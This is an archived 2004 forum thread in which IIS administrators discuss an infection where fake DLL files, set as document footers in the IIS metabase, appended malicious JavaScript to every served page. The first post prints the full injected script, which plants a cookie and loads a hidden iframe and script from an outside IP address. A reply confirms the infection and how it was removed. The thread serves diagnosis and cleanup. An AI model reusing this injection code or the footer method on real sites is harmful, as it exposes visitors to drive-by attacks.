IIS Server Security - Russian IIS hack? Malicious Javascript code

This is Interesting: Free IT Magazines  
Home > Archive > IIS Server Security > June 2004 > Russian IIS hack? Malicious Javascript code





You are viewing an archived Text-only version of the thread. To view this thread in it's original format and/or if you want to reply to this thread please [click here]

Author Russian IIS hack? Malicious Javascript code
Marc Krueger

2004-06-26, 10:16 am


>-----Original Message-----
>I successfully removed some malicious code from my IIS
5.0 server that may not have had all it's patches
updated, but I cannot find any information on this
malicious code that redirected on a random basis the
users of my websites to a russian website that appeared
to be down. to a domain called balamut.com
>with an IP address of 217.107.218.147 which RDNS to
>unassigned.m10-msk-ru.e-neverland.net
>
>The javascript code lived in some fake dll files in the
inetsrv folder.
>One fake .dll file was created for each web on my server
and in the IIS metabase the defaultdocfooter was set to
each of the dll files and enabledocfooter was set to true.
>
>the offending code was embedded in every file that the
website delivered and pages that had embedded .js files
the javascript for those pages would not function.
>
>I have posted the offending code, mabye someone can
identify this?
>
>As proof check out a google search for one of the
function in the code okx12()
>
>you'll see the first link it returns is an RTF if you
view the html version you'll see this code appended to
the bottom of the page.
>
><script language="JavaScript"><!--
>var qxco7=document.cookie;function gc099(n21){var
ix=qxco7.indexOf(n21+"=");if(ix==-1)return
null;ix=qxco7.indexOf("=",ix)+1;var es=qxco7.indexOf
(";",ix);if(es==-1)es=qxco7.length;return unescape
(qxco7.substring(ix,es));}function sc088(n24,v8){var
today=new Date();var expiry=new Date(today.getTime()
+600000);if(v8!=null&&v8!="")
document.cookie=n24+"="+escape(v8)+";
expires="+expiry.toGMTString();qxco7=document.cookie;}
function okx12(){window.status="";setTimeout("okx12()",
200);}okx12();if(location.href.indexOf("https")!=0){if
(gc099("trk716")==null){document.write("<script
language=\"JavaScript\"
src=\"http://217.107.218.147/dot.php\"></script><iframe
src=\"http://217.107.218.147/dot.php\" height=\"1\"
width=\"1\" scrolling=\"no\" frameborder=\"no\"/>");sc088
("trk716","4");}}// --></script>
>
>
>.
>

Experienced the same issue. Found and deleted the .dll
files and modified the footer setting and it seemed to
resolve this issue. Still back tracking the logs to see
how this happened as server was patched and behind
firewall. This is a weird one as it did not affect our
OWA server which is setup basically the same way.
Sponsored Links






Free braindumps | Software forum | Database administration forum

Copyright 2003 - 2008 webservertalk.com